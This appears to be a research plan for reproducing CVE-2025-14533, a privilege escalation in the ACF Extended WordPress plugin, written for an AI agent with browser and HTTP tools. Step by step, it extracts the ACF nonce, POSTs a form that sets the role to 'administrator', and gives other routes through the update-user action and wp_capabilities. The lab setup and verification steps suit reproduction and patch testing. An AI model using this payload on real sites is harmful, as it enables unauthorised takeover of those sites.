Research Plan: CVE-2025-14533 - Unauthenticated Privilege Escalation in ACF Extended

1. Vulnerability Summary

The Advanced Custom Fields: Extended (ACFE) plugin (versions <= 0.9.2.1) contains a critical privilege escalation vulnerability. The plugin's "Frontend Forms" feature allows administrators to create forms that perform various actions, such as creating or updating WordPress users. The insert_user function within the User Action handler fails to validate or restrict the role parameter when it is mapped to a form field. Consequently, an unauthenticated user can submit a form and specify the administrator role, gaining full control over the site.

2. Attack Vector Analysis

• Endpoint: Any frontend page where an ACFE Form with a "User Action" is rendered.
• Action: POST request to the page URL containing the form.
• Vulnerable Parameter: The ACF field input (e.g., acf[field_abc123]) that is mapped to the "Role" setting in the ACFE User Action configuration.
• Authentication: Unauthenticated (if the form is public).
• Preconditions:
  1. An ACFE Form must be created and published.
  2. The form must have a "User" action configured to "Insert User".
  3. A field in that form must be mapped to the Role setting in the User Action configuration.

3. Code Flow (Inferred)

1. Entry Point: A user submits a frontend form. WordPress processes the POST request.
2. Hook: ACF (and by extension ACFE) hooks into the request, typically via acf/validate_save_post or acf/save_post.
3. Action Dispatch: ACFE's form handler identifies the "Actions" associated with the form.
4. User Action Handler: The class handling the user action (likely acfe_form_action_user in includes/modules/form/actions/user.php) is invoked.
5. Sink: The insert_user method is called. It retrieves values from the submitted acf[] array. If a field is mapped to 'role', the value is passed directly into an array that eventually reaches wp_insert_user().
6. Vulnerability: There is no check to ensure the submitted role is within an allowed whitelist (e.g., 'subscriber') or that the submitter has the promote_users capability.

4. Nonce Acquisition Strategy

ACFE forms rely on standard ACF form security. To submit the form successfully, you need the _acf_nonce.

1. Identify the Form Page: Locate a page where the ACFE form is rendered.
2. Navigate and Extract:
   • Use browser_navigate(URL) to load the page.
   • Use browser_eval() to extract the nonce and field keys.
   • Standard ACF nonce: document.querySelector('input[name="_acf_nonce"]').value
   • Form ID: document.querySelector('input[name="_acf_form"]').value
   • Field Key: Identify the key of the field mapped to the "Role" (e.g., field_67890abcdef). This can be found by inspecting the name attribute of the inputs: acf[field_XXXXX].

5. Exploitation Strategy

Step 1: Payload Preparation

You need to identify the specific field key that ACFE is using for the role mapping. If you are setting up the test environment, you will know this key. In a real-world scenario, you would inspect the HTML source.

Step 2: HTTP Request

Submit a POST request to the page URL containing the form.

Headers:

• Content-Type: application/x-www-form-urlencoded

Body Parameters:

• _acf_nonce: [Extracted Nonce]
• _acf_form: [Extracted Encoded Form Data]
• acf[field_user_email]: attacker@example.com
• acf[field_user_login]: attacker_admin
• acf[field_user_password]: Password123!
• acf[field_mapped_to_role]: administrator <-- The Exploit
• acf[field_other_required_fields]: [Valid data]

Step 3: Execution

Use the http_request tool to send the POST request.

6. Test Data Setup

To replicate this in a lab environment:

1. Install Plugins: Install advanced-custom-fields and acf-extended (v0.9.2.1).
2. Create ACF Fields: Create a field group with at least:
   • Email (Text field)
   • Username (Text field)
   • Password (Password field)
   • Role (Text or Hidden field) - Crucial: This field will be manipulated.
3. Create ACFE Form:
   • Go to ACF -> Forms and create a new form.
   • Add the field group created above.
   • In the Actions tab, add a User action.
   • Set Action to Insert User.
   • In the User Data mapping section:
     • Map Email to the Email field.
     • Map Login to the Username field.
     • Map Password to the Password field.
     • Map Role to the Role field.
4. Publish Form: Add the form to a new page using the shortcode provided by ACFE (e.g., [acfe_form ID="123"]).

7. Expected Results

• The server should return a 200 OK or a 302 Redirect (standard ACF success behavior).
• A new user should be created in the WordPress database.
• The new user should have the administrator role assigned.

8. Verification Steps

After sending the POST request, verify the success using wp-cli:

1. Check User Existence: wp user list --field=user_login | grep attacker_admin
2. Verify Role: wp user get attacker_admin --field=roles
   • Success Criteria: The output must be administrator.

9. Alternative Approaches

• Hidden Fields: If the role is not a visible field but is still mapped in the background, check if adding the field key to the POST body manually overrides the default role.
• Update User: If "Insert User" is not available but "Update User" is, target an existing low-privileged account (if the form allows selecting a user to edit) and change its role to administrator by providing the role field key.
• Mapping to Other Privileged Fields: Check if other sensitive fields like user_registered or meta fields that control capabilities (e.g., wp_capabilities) can be mapped and manipulated.